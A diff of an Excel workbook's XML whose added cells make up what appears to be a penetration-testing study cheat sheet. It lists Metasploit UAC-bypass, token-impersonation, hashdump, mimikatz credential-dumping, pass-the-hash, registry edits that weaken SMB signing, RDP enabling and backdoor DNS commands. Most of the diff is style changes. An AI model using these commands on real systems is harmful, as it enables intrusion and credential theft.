+  </si>
+  <si>
+    <t>Choose a module</t>
+  </si>
+  <si>
+    <t>msf exploit(bypassuac_vbs) &gt; sessions</t>
+  </si>
+  <si>
+    <t>msf exploit(bypassuac_vbs) &gt; set SESSION 6</t>
+  </si>
+  <si>
+    <t>set the session id on which the module will be executed (based on session command before)</t>
+  </si>
+  <si>
+    <t>msf exploit(bypassuac_vbs) &gt; exploit</t>
+  </si>
+  <si>
+    <t>Recheck admin priv</t>
+  </si>
+  <si>
+    <t>Check admin priv and see if UAC is enabled</t>
+  </si>
+  <si>
+    <t>See what msf module is available</t>
+  </si>
+  <si>
+    <t>Works only on several occation (i.e. UAC is disabled)</t>
+  </si>
+  <si>
+    <t>Check exploit for an OS</t>
+  </si>
+  <si>
+    <t>meterpreter &gt; getsystem</t>
+  </si>
+  <si>
+    <t>meterpreter &gt; getuid</t>
+  </si>
+  <si>
+    <t>meterpreter &gt; sysinfo</t>
+  </si>
+  <si>
+    <t>Reconfirm</t>
+  </si>
+  <si>
+    <t>Incognito</t>
+  </si>
+  <si>
+    <t>UAC exploit tool</t>
+  </si>
+  <si>
+    <t>General</t>
+  </si>
+  <si>
+    <t>meterpreter &gt; use incognito</t>
+  </si>
+  <si>
+    <t>incognito</t>
+  </si>
+  <si>
+    <t>meterpreter &gt; list_tokens -u</t>
+  </si>
+  <si>
+    <t>List all tokem</t>
+  </si>
+  <si>
+    <t>meterpreter &gt; impersonate_token</t>
+  </si>
+  <si>
+    <t>Impersonate other people's token</t>
+  </si>
+  <si>
+    <t>wmic</t>
+  </si>
+  <si>
+    <t>sc qc</t>
+  </si>
+  <si>
+    <t>Query a specifc service ; https://ss64.com/nt/sc.html</t>
+  </si>
+  <si>
+    <t>Query for all services and paths ; https://msdn.microsoft.com/en-us/library/aa394531(v=vs.85).asp</t>
+  </si>
+  <si>
+    <t>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |finder /i /v """</t>
+  </si>
+  <si>
+    <t>find unquoted paths</t>
+  </si>
+  <si>
+    <t>sc</t>
+  </si>
+  <si>
+    <t>sc qc &lt;service_name&gt;</t>
+  </si>
+  <si>
+    <t>Query a specific service, and manually check for an unquoted path</t>
+  </si>
+  <si>
+    <t>exploit/windows/local/trusted_service_path</t>
+  </si>
+  <si>
+    <t>Automatically exploit Unquoted Path-vulnerable instance</t>
+  </si>
+  <si>
+    <t>Windows token exploit tool  ; https://www.gracefulsecurity.com/privesc-stealing-windows-access-tokens-incognito/</t>
+  </si>
+  <si>
+    <t>Windows Priv.Esc</t>
+  </si>
+  <si>
+    <t>Linux Priv.Esc</t>
+  </si>
+  <si>
+    <t>meterpreter &gt; run post/linux/gather/enum_system</t>
+  </si>
+  <si>
+    <t>meterpreter &gt; upload /home/stduser/Downloads/37292.c</t>
+  </si>
+  <si>
+    <t>gcc</t>
+  </si>
+  <si>
+    <t>meterpreter &gt; ls</t>
+  </si>
+  <si>
+    <t>meterpreter &gt; shell</t>
+  </si>
+  <si>
+    <t>To compile on target ; we can also compile on our PC</t>
+  </si>
+  <si>
+    <t>Remember settings</t>
+  </si>
+  <si>
+    <t>gcc 37292.c -o exploit</t>
+  </si>
+  <si>
+    <t>chmod +x exploit</t>
+  </si>
+  <si>
+    <t>./exploit</t>
+  </si>
+  <si>
+    <t>To make sure, check whoami</t>
+  </si>
+  <si>
+    <t>Maintaining Access</t>
+  </si>
+  <si>
+    <t>SAM databases</t>
+  </si>
+  <si>
+    <t>hashdump</t>
+  </si>
+  <si>
+    <t>May fail</t>
+  </si>
+  <si>
+    <t>psexec</t>
+  </si>
+  <si>
+    <t>meterpreter &gt; hashdump</t>
+  </si>
+  <si>
+    <t>msf exploit(psexec) &gt; set SMBPASS</t>
+  </si>
+  <si>
+    <t>msf exploit(psexec) &gt; set RHSOT 192.168.102.155</t>
+  </si>
+  <si>
+    <t>msf exploit(psexec) &gt; exploit</t>
+  </si>
+  <si>
+    <t>msf exploit(psexec) &gt; set SMBUSER els</t>
+  </si>
+  <si>
+    <t>Set parameters to impersonate</t>
+  </si>
+  <si>
+    <t>May fail, change in registry may be needed</t>
+  </si>
+  <si>
+    <t>Set-ItemProperty</t>
+  </si>
+  <si>
+    <t>Set registry given admin priv</t>
+  </si>
+  <si>
+    <t>Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LocalAccountTokenFitlerPolicy -Value 1 -Type Dword</t>
+  </si>
+  <si>
+    <t>Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\LanManServer\Parameters -Name LocalAccountTokenFitlerPolicy -Value 1 -Type Dword</t>
+  </si>
+  <si>
+    <t>reg</t>
+  </si>
+  <si>
+    <t>reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters" \v RequireSecuritySignature /t REG_WORD /d 0 /f</t>
+  </si>
+  <si>
+    <t>reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" \v LocalAccountTokenFilterPolicy /t REG_WORD /d 1 /f</t>
+  </si>
+  <si>
+    <t>xfreerdp</t>
+  </si>
+  <si>
+    <t>Log in to rdp client given NTLM hash</t>
+  </si>
+  <si>
+    <t>xfreerdp /u:admin /d:foocorp /pth: 9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41 /v:172.16.22.119</t>
+  </si>
+  <si>
+    <t>Pass the hash</t>
+  </si>
+  <si>
+    <t>Crack the hash</t>
+  </si>
+  <si>
+    <t>mimikatz</t>
+  </si>
+  <si>
+    <t>https://github.com/gentilkiwi/mimikatz</t>
+  </si>
+  <si>
+    <t>meterpreter &gt; ps -A x86_64 -s</t>
+  </si>
+  <si>
+    <t>Lists all 64 bit process</t>
+  </si>
+  <si>
+    <t>meterpreter &gt; migrate 448</t>
+  </si>
+  <si>
+    <t>Migrate to 64 bit process (48)</t>
+  </si>
+  <si>
+    <t>meterpreter &gt; load mimikatz</t>
+  </si>
+  <si>
+    <t>Run this when unsure</t>
+  </si>
+  <si>
+    <t>wdigest</t>
+  </si>
+  <si>
+    <t>Retrieve credentials (in the tutorial, retrieve creds given by mimikatz)</t>
+  </si>
+  <si>
+    <t>meterpreter &gt; wdigest</t>
+  </si>
+  <si>
+    <t>Retrieve creds</t>
+  </si>
+  <si>
+    <t>Load the module and show help menu (?)</t>
+  </si>
+  <si>
+    <t>meterpreter &gt; mimikatz_command -f *::</t>
+  </si>
+  <si>
+    <t>Run custom command if you want to</t>
+  </si>
+  <si>
+    <t>wce</t>
+  </si>
+  <si>
+    <t>Windows Credentials Editor ; http://www.ampliasecurity.com/research/windows-credentials-editor/</t>
+  </si>
+  <si>
+    <t>meterpreter &gt; execute -i -f wce.exe -a -h</t>
+  </si>
+  <si>
+    <t>Show help menu</t>
+  </si>
+  <si>
+    <t>net start</t>
+  </si>
+  <si>
+    <t>Check for enabled services on a session</t>
+  </si>
+  <si>
+    <t>Check for enabled services on a session ; https://msdn.microsoft.com/en-us/library/bb742610.aspx</t>
+  </si>
+  <si>
+    <t>run service_manager -1</t>
+  </si>
+  <si>
+    <t>run post/windows/gather/enum_services</t>
+  </si>
+  <si>
+    <t>getgui</t>
+  </si>
+  <si>
+    <t>meterpreter &gt; run getgui -e</t>
+  </si>
+  <si>
+    <t>Enable rdp</t>
+  </si>
+  <si>
+    <t>meterpreter &gt; run getgui -h</t>
+  </si>
+  <si>
+    <t>Run help</t>
+  </si>
+  <si>
+    <t>Enable RDP (Remote Desktop Privileges)</t>
+  </si>
+  <si>
+    <t>net localgroup</t>
+  </si>
+  <si>
+    <t>Add a user to localgroup</t>
+  </si>
+  <si>
+    <t>net localgroup "Remote Desktop Users" els_user /add</t>
+  </si>
+  <si>
+    <t>rdesktop</t>
+  </si>
+  <si>
+    <t>establish rdp connection</t>
+  </si>
+  <si>
+    <t>rdesktop [IP_ADDRESS] -u [USERNAME] -p [PWD]</t>
+  </si>
+  <si>
+    <t>List all localgroups</t>
+  </si>
+  <si>
+    <t>Backdoor</t>
+  </si>
+  <si>
+    <t>freedns</t>
+  </si>
+  <si>
+    <t>zoneedit</t>
+  </si>
+  <si>
+    <t>xname</t>
+  </si>
+  <si>
+    <t>http://freedns.afraid.org/</t>
+  </si>
+  <si>
+    <t>http://www.zoneedit.com/dynamicDNS.html</t>
+  </si>
+  <si>
+    <t>http://xname.org/</t>
   </si>
 </sst>
 </file>
@@ -1906,7 +2284,7 @@
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
     <xf numFmtId="0" fontId="4" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
   </cellStyleXfs>
-  <cellXfs count="67">
+  <cellXfs count="74">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
     <xf numFmtId="49" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1"/>
@@ -1956,21 +2334,6 @@
     <xf numFmtId="49" fontId="0" fillId="4" borderId="14" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1"/>
     <xf numFmtId="49" fontId="0" fillId="0" borderId="14" xfId="0" applyNumberFormat="1" applyBorder="1"/>
     <xf numFmtId="49" fontId="0" fillId="0" borderId="15" xfId="0" applyNumberFormat="1" applyBorder="1"/>
-    <xf numFmtId="49" fontId="2" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="center"/>
-    </xf>
-    <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
-      <alignment horizontal="center"/>
-    </xf>
-    <xf numFmtId="49" fontId="3" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
-      <alignment horizontal="center"/>
-    </xf>
-    <xf numFmtId="49" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
-      <alignment horizontal="center"/>
-    </xf>
-    <xf numFmtId="49" fontId="3" fillId="5" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
-      <alignment horizontal="center"/>
-    </xf>
     <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
       <alignment horizontal="left" vertical="top"/>
     </xf>
@@ -1984,14 +2347,38 @@
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFill="1"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" quotePrefix="1" applyNumberFormat="1" applyFill="1"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1"/>
-    <xf numFmtId="0" fontId="3" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
-      <alignment horizontal="center"/>
-    </xf>
     <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1"/>
     <xf numFmtId="49" fontId="5" fillId="0" borderId="2" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
     <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
     <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="1" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
     <xf numFmtId="49" fontId="5" fillId="0" borderId="2" xfId="1" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
+    <xf numFmtId="49" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
+      <alignment horizontal="center"/>
+    </xf>
+    <xf numFmtId="49" fontId="3" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
+      <alignment horizontal="center"/>
+    </xf>
+    <xf numFmtId="49" fontId="2" fillId="0" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center"/>
+    </xf>
+    <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
+      <alignment horizontal="center"/>
+    </xf>
+    <xf numFmtId="49" fontId="3" fillId="5" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
+      <alignment horizontal="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="3" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
+      <alignment horizontal="center"/>
+    </xf>
+    <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="0" quotePrefix="1" applyNumberFormat="1" applyAlignment="1">
+      <alignment horizontal="left" vertical="center"/>
+    </xf>
+    <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1"/>
+    <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1"/>
+    <xf numFmtId="49" fontId="0" fillId="0" borderId="2" xfId="1" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
+    <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1"/>
+    <xf numFmtId="49" fontId="5" fillId="4" borderId="2" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1"/>
+    <xf numFmtId="49" fontId="0" fillId="0" borderId="6" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1"/>
   </cellXfs>
   <cellStyles count="2">
     <cellStyle name="Hyperlink" xfId="1" builtinId="8"/>
@@ -2323,11 +2710,11 @@
   </cols>
   <sheetData>
     <row r="2" spans="1:9" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="B2" s="49" t="s">
+      <c r="B2" s="63" t="s">
         <v>0</v>
       </c>
-      <c r="C2" s="49"/>
-      <c r="D2" s="49"/>
+      <c r="C2" s="63"/>
+      <c r="D2" s="63"/>
       <c r="E2" s="2"/>
       <c r="F2" s="2"/>
     </row>
@@ -2738,20 +3125,20 @@
       <c r="D39" s="15"/>
     </row>
     <row r="41" spans="1:9" x14ac:dyDescent="0.25">
-      <c r="A41" s="50" t="s">
+      <c r="A41" s="64" t="s">
         <v>68</v>
       </c>
-      <c r="B41" s="50"/>
-      <c r="C41" s="50"/>
-      <c r="D41" s="50"/>
+      <c r="B41" s="64"/>
+      <c r="C41" s="64"/>
+      <c r="D41" s="64"/>
     </row>
     <row r="42" spans="1:9" x14ac:dyDescent="0.25">
-      <c r="A42" s="51" t="s">
+      <c r="A42" s="62" t="s">
         <v>4</v>
       </c>
-      <c r="B42" s="51"/>
-      <c r="C42" s="51"/>
-      <c r="D42" s="51"/>
+      <c r="B42" s="62"/>
+      <c r="C42" s="62"/>
+      <c r="D42" s="62"/>
       <c r="E42" s="1" t="s">
         <v>69</v>
       </c>
@@ -2820,12 +3207,12 @@
       </c>
     </row>
     <row r="51" spans="1:5" x14ac:dyDescent="0.25">
-      <c r="A51" s="51" t="s">
+      <c r="A51" s="62" t="s">
         <v>43</v>
       </c>
-      <c r="B51" s="51"/>
-      <c r="C51" s="51"/>
-      <c r="D51" s="51"/>
+      <c r="B51" s="62"/>
+      <c r="C51" s="62"/>
+      <c r="D51" s="62"/>
       <c r="E51" s="1" t="s">
         <v>85</v>
       </c>
@@ -2836,12 +3223,12 @@
       </c>
     </row>
     <row r="53" spans="1:5" x14ac:dyDescent="0.25">
-      <c r="A53" s="51" t="s">
+      <c r="A53" s="62" t="s">
         <v>45</v>
       </c>
-      <c r="B53" s="51"/>
-      <c r="C53" s="51"/>
-      <c r="D53" s="51"/>
+      <c r="B53" s="62"/>
+      <c r="C53" s="62"/>
+      <c r="D53" s="62"/>
     </row>
     <row r="54" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A54" s="1" t="s">
@@ -2885,12 +3272,12 @@
       </c>
     </row>
     <row r="61" spans="1:5" x14ac:dyDescent="0.25">
-      <c r="A61" s="51" t="s">
+      <c r="A61" s="62" t="s">
         <v>46</v>
       </c>
-      <c r="B61" s="51"/>
-      <c r="C61" s="51"/>
-      <c r="D61" s="51"/>
+      <c r="B61" s="62"/>
+      <c r="C61" s="62"/>
+      <c r="D61" s="62"/>
     </row>
     <row r="62" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A62" s="1" t="s">
@@ -2916,12 +3303,12 @@
       </c>
     </row>
     <row r="66" spans="1:5" x14ac:dyDescent="0.25">
-      <c r="A66" s="51" t="s">
+      <c r="A66" s="62" t="s">
         <v>53</v>
       </c>
-      <c r="B66" s="51"/>
-      <c r="C66" s="51"/>
-      <c r="D66" s="51"/>
+      <c r="B66" s="62"/>
+      <c r="C66" s="62"/>
+      <c r="D66" s="62"/>
       <c r="E66" s="1" t="s">
         <v>105</v>
       </c>
@@ -2943,12 +3330,12 @@
       </c>
     </row>
     <row r="73" spans="1:5" x14ac:dyDescent="0.25">
-      <c r="A73" s="51" t="s">
+      <c r="A73" s="62" t="s">
         <v>106</v>
       </c>
-      <c r="B73" s="51"/>
-      <c r="C73" s="51"/>
-      <c r="D73" s="51"/>
+      <c r="B73" s="62"/>
+      <c r="C73" s="62"/>
+      <c r="D73" s="62"/>
     </row>
     <row r="74" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A74" s="1" t="s">
@@ -2977,10 +3364,10 @@
       <c r="D77" s="25"/>
     </row>
     <row r="78" spans="1:5" x14ac:dyDescent="0.25">
-      <c r="A78" s="52"/>
-      <c r="B78" s="52"/>
-      <c r="C78" s="52"/>
-      <c r="D78" s="52"/>
+      <c r="A78" s="61"/>
+      <c r="B78" s="61"/>
+      <c r="C78" s="61"/>
+      <c r="D78" s="61"/>
     </row>
     <row r="79" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A79" s="25"/>
@@ -3001,10 +3388,10 @@
       <c r="D81" s="25"/>
     </row>
     <row r="82" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A82" s="52"/>
-      <c r="B82" s="52"/>
-      <c r="C82" s="52"/>
-      <c r="D82" s="52"/>
+      <c r="A82" s="61"/>
+      <c r="B82" s="61"/>
+      <c r="C82" s="61"/>
+      <c r="D82" s="61"/>
     </row>
     <row r="83" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A83" s="25"/>
@@ -3025,10 +3412,10 @@
       <c r="D85" s="25"/>
     </row>
     <row r="86" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A86" s="52"/>
-      <c r="B86" s="52"/>
-      <c r="C86" s="52"/>
-      <c r="D86" s="52"/>
+      <c r="A86" s="61"/>
+      <c r="B86" s="61"/>
+      <c r="C86" s="61"/>
+      <c r="D86" s="61"/>
     </row>
     <row r="87" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A87" s="25"/>
@@ -3049,10 +3436,10 @@
       <c r="D89" s="25"/>
     </row>
     <row r="90" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A90" s="52"/>
-      <c r="B90" s="52"/>
-      <c r="C90" s="52"/>
-      <c r="D90" s="52"/>
+      <c r="A90" s="61"/>
+      <c r="B90" s="61"/>
+      <c r="C90" s="61"/>
+      <c r="D90" s="61"/>
     </row>
     <row r="91" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A91" s="25"/>
@@ -3074,6 +3461,11 @@
     </row>
   </sheetData>
   <mergeCells count="12">
+    <mergeCell ref="B2:D2"/>
+    <mergeCell ref="A41:D41"/>
+    <mergeCell ref="A42:D42"/>
+    <mergeCell ref="A78:D78"/>
+    <mergeCell ref="A82:D82"/>
     <mergeCell ref="A86:D86"/>
     <mergeCell ref="A90:D90"/>
     <mergeCell ref="A51:D51"/>
@@ -3081,11 +3473,6 @@
     <mergeCell ref="A61:D61"/>
     <mergeCell ref="A66:D66"/>
     <mergeCell ref="A73:D73"/>
-    <mergeCell ref="B2:D2"/>
-    <mergeCell ref="A41:D41"/>
-    <mergeCell ref="A42:D42"/>
-    <mergeCell ref="A78:D78"/>
-    <mergeCell ref="A82:D82"/>
   </mergeCells>
   <hyperlinks>
     <hyperlink ref="B7" r:id="rId1" xr:uid="{8F939294-532C-436D-B930-D61643E2D7AB}"/>
@@ -3115,12 +3502,12 @@
   </cols>
   <sheetData>
     <row r="2" spans="1:9" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="A2" s="49" t="s">
+      <c r="A2" s="63" t="s">
         <v>0</v>
       </c>
-      <c r="B2" s="49"/>
-      <c r="C2" s="49"/>
-      <c r="D2" s="49"/>
+      <c r="B2" s="63"/>
+      <c r="C2" s="63"/>
+      <c r="D2" s="63"/>
       <c r="E2" s="2"/>
       <c r="F2" s="2"/>
     </row>
@@ -3258,32 +3645,32 @@
       <c r="D13" s="16"/>
     </row>
     <row r="15" spans="1:9" x14ac:dyDescent="0.25">
-      <c r="A15" s="50" t="s">
+      <c r="A15" s="64" t="s">
         <v>68</v>
       </c>
-      <c r="B15" s="50"/>
-      <c r="C15" s="50"/>
-      <c r="D15" s="50"/>
+      <c r="B15" s="64"/>
+      <c r="C15" s="64"/>
+      <c r="D15" s="64"/>
     </row>
     <row r="16" spans="1:9" x14ac:dyDescent="0.25">
-      <c r="A16" s="51" t="s">
+      <c r="A16" s="62" t="s">
         <v>53</v>
       </c>
-      <c r="B16" s="51"/>
-      <c r="C16" s="51"/>
-      <c r="D16" s="51"/>
+      <c r="B16" s="62"/>
+      <c r="C16" s="62"/>
+      <c r="D16" s="62"/>
       <c r="E16" s="8" t="s">
         <v>123</v>
       </c>
       <c r="I16" s="25"/>
     </row>
     <row r="17" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A17" s="53" t="s">
+      <c r="A17" s="65" t="s">
         <v>124</v>
       </c>
-      <c r="B17" s="53"/>
-      <c r="C17" s="53"/>
-      <c r="D17" s="53"/>
+      <c r="B17" s="65"/>
+      <c r="C17" s="65"/>
+      <c r="D17" s="65"/>
     </row>
     <row r="18" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A18" s="1" t="s">
@@ -3315,12 +3702,12 @@
       </c>
     </row>
     <row r="22" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A22" s="53" t="s">
+      <c r="A22" s="65" t="s">
         <v>132</v>
       </c>
-      <c r="B22" s="53"/>
-      <c r="C22" s="53"/>
-      <c r="D22" s="53"/>
+      <c r="B22" s="65"/>
+      <c r="C22" s="65"/>
+      <c r="D22" s="65"/>
     </row>
     <row r="23" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A23" s="1" t="s">
@@ -3347,12 +3734,12 @@
       </c>
     </row>
     <row r="26" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A26" s="53" t="s">
+      <c r="A26" s="65" t="s">
         <v>139</v>
       </c>
-      <c r="B26" s="53"/>
-      <c r="C26" s="53"/>
-      <c r="D26" s="53"/>
+      <c r="B26" s="65"/>
+      <c r="C26" s="65"/>
+      <c r="D26" s="65"/>
     </row>
     <row r="27" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A27" s="1" t="s">
@@ -3413,20 +3800,20 @@
       </c>
     </row>
     <row r="34" spans="1:5" x14ac:dyDescent="0.25">
-      <c r="A34" s="51" t="s">
+      <c r="A34" s="62" t="s">
         <v>109</v>
       </c>
-      <c r="B34" s="51"/>
-      <c r="C34" s="51"/>
-      <c r="D34" s="51"/>
+      <c r="B34" s="62"/>
+      <c r="C34" s="62"/>
+      <c r="D34" s="62"/>
     </row>
     <row r="35" spans="1:5" x14ac:dyDescent="0.25">
-      <c r="A35" s="53" t="s">
+      <c r="A35" s="65" t="s">
         <v>162</v>
       </c>
-      <c r="B35" s="53"/>
-      <c r="C35" s="53"/>
-      <c r="D35" s="53"/>
+      <c r="B35" s="65"/>
+      <c r="C35" s="65"/>
+      <c r="D35" s="65"/>
     </row>
     <row r="36" spans="1:5" x14ac:dyDescent="0.25">
       <c r="A36" s="1" t="s">
@@ -3461,12 +3848,12 @@
       </c>
     </row>
     <row r="40" spans="1:5" x14ac:dyDescent="0.25">
-      <c r="A40" s="51" t="s">
+      <c r="A40" s="62" t="s">
         <v>111</v>
       </c>
-      <c r="B40" s="51"/>
-      <c r="C40" s="51"/>
-      <c r="D40" s="51"/>
+      <c r="B40" s="62"/>
+      <c r="C40" s="62"/>
+      <c r="D40" s="62"/>
       <c r="E40" s="1" t="s">
         <v>166</v>
       </c>
@@ -3480,12 +3867,12 @@
       </c>
     </row>
     <row r="42" spans="1:5" x14ac:dyDescent="0.25">
-      <c r="A42" s="51" t="s">
+      <c r="A42" s="62" t="s">
         <v>112</v>
       </c>
-      <c r="B42" s="51"/>
-      <c r="C42" s="51"/>
-      <c r="D42" s="51"/>
+      <c r="B42" s="62"/>
+      <c r="C42" s="62"/>
+      <c r="D42" s="62"/>
       <c r="E42" s="35" t="s">
         <v>167</v>
       </c>
@@ -3499,12 +3886,12 @@
       </c>
     </row>
     <row r="44" spans="1:5" x14ac:dyDescent="0.25">
-      <c r="A44" s="51" t="s">
+      <c r="A44" s="62" t="s">
         <v>169</v>
       </c>
-      <c r="B44" s="51"/>
-      <c r="C44" s="51"/>
-      <c r="D44" s="51"/>
+      <c r="B44" s="62"/>
+      <c r="C44" s="62"/>
+      <c r="D44" s="62"/>
       <c r="E44" s="1" t="s">
         <v>168</v>
       </c>
@@ -3614,10 +4001,10 @@
       <c r="D62" s="25"/>
     </row>
     <row r="63" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A63" s="52"/>
-      <c r="B63" s="52"/>
-      <c r="C63" s="52"/>
-      <c r="D63" s="52"/>
+      <c r="A63" s="61"/>
+      <c r="B63" s="61"/>
+      <c r="C63" s="61"/>
+      <c r="D63" s="61"/>
     </row>
     <row r="64" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A64" s="25"/>
@@ -3638,10 +4025,10 @@
       <c r="D66" s="25"/>
     </row>
     <row r="67" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A67" s="52"/>
-      <c r="B67" s="52"/>
-      <c r="C67" s="52"/>
-      <c r="D67" s="52"/>
+      <c r="A67" s="61"/>
+      <c r="B67" s="61"/>
+      <c r="C67" s="61"/>
+      <c r="D67" s="61"/>
     </row>
     <row r="68" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A68" s="25"/>
@@ -3662,10 +4049,10 @@
       <c r="D70" s="25"/>
     </row>
     <row r="71" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A71" s="52"/>
-      <c r="B71" s="52"/>
-      <c r="C71" s="52"/>
-      <c r="D71" s="52"/>
+      <c r="A71" s="61"/>
+      <c r="B71" s="61"/>
+      <c r="C71" s="61"/>
+      <c r="D71" s="61"/>
     </row>
     <row r="72" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A72" s="25"/>
@@ -3732,12 +4119,12 @@
   </cols>
   <sheetData>
     <row r="2" spans="1:9" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="A2" s="49" t="s">
+      <c r="A2" s="63" t="s">
         <v>0</v>
       </c>
-      <c r="B2" s="49"/>
-      <c r="C2" s="49"/>
-      <c r="D2" s="49"/>
+      <c r="B2" s="63"/>
+      <c r="C2" s="63"/>
+      <c r="D2" s="63"/>
       <c r="E2" s="2"/>
       <c r="F2" s="2"/>
     </row>
@@ -3934,20 +4321,20 @@
       </c>
     </row>
     <row r="21" spans="1:9" x14ac:dyDescent="0.25">
-      <c r="A21" s="50" t="s">
+      <c r="A21" s="64" t="s">
         <v>68</v>
       </c>
-      <c r="B21" s="50"/>
-      <c r="C21" s="50"/>
-      <c r="D21" s="50"/>
+      <c r="B21" s="64"/>
+      <c r="C21" s="64"/>
+      <c r="D21" s="64"/>
     </row>
     <row r="22" spans="1:9" x14ac:dyDescent="0.25">
-      <c r="A22" s="51" t="s">
+      <c r="A22" s="62" t="s">
         <v>172</v>
       </c>
-      <c r="B22" s="51"/>
-      <c r="C22" s="51"/>
-      <c r="D22" s="51"/>
+      <c r="B22" s="62"/>
+      <c r="C22" s="62"/>
+      <c r="D22" s="62"/>
       <c r="I22" s="25"/>
     </row>
     <row r="23" spans="1:9" x14ac:dyDescent="0.25">
@@ -4052,12 +4439,12 @@
       </c>
     </row>
     <row r="32" spans="1:9" x14ac:dyDescent="0.25">
-      <c r="A32" s="51" t="s">
+      <c r="A32" s="62" t="s">
         <v>201</v>
       </c>
-      <c r="B32" s="51"/>
-      <c r="C32" s="51"/>
-      <c r="D32" s="51"/>
+      <c r="B32" s="62"/>
+      <c r="C32" s="62"/>
+      <c r="D32" s="62"/>
     </row>
     <row r="33" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A33" s="43" t="s">
@@ -4068,12 +4455,12 @@
       <c r="D33" s="42"/>
     </row>
     <row r="34" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A34" s="51" t="s">
+      <c r="A34" s="62" t="s">
         <v>202</v>
       </c>
-      <c r="B34" s="51"/>
-      <c r="C34" s="51"/>
-      <c r="D34" s="51"/>
+      <c r="B34" s="62"/>
+      <c r="C34" s="62"/>
+      <c r="D34" s="62"/>
     </row>
     <row r="35" spans="1:4" x14ac:dyDescent="0.25">
       <c r="A35" s="41" t="s">
@@ -4106,12 +4493,12 @@
       <c r="D37" s="42"/>
     </row>
     <row r="38" spans="1:4" x14ac:dyDescent="0.25">
-      <c r="A38" s="51" t="s">
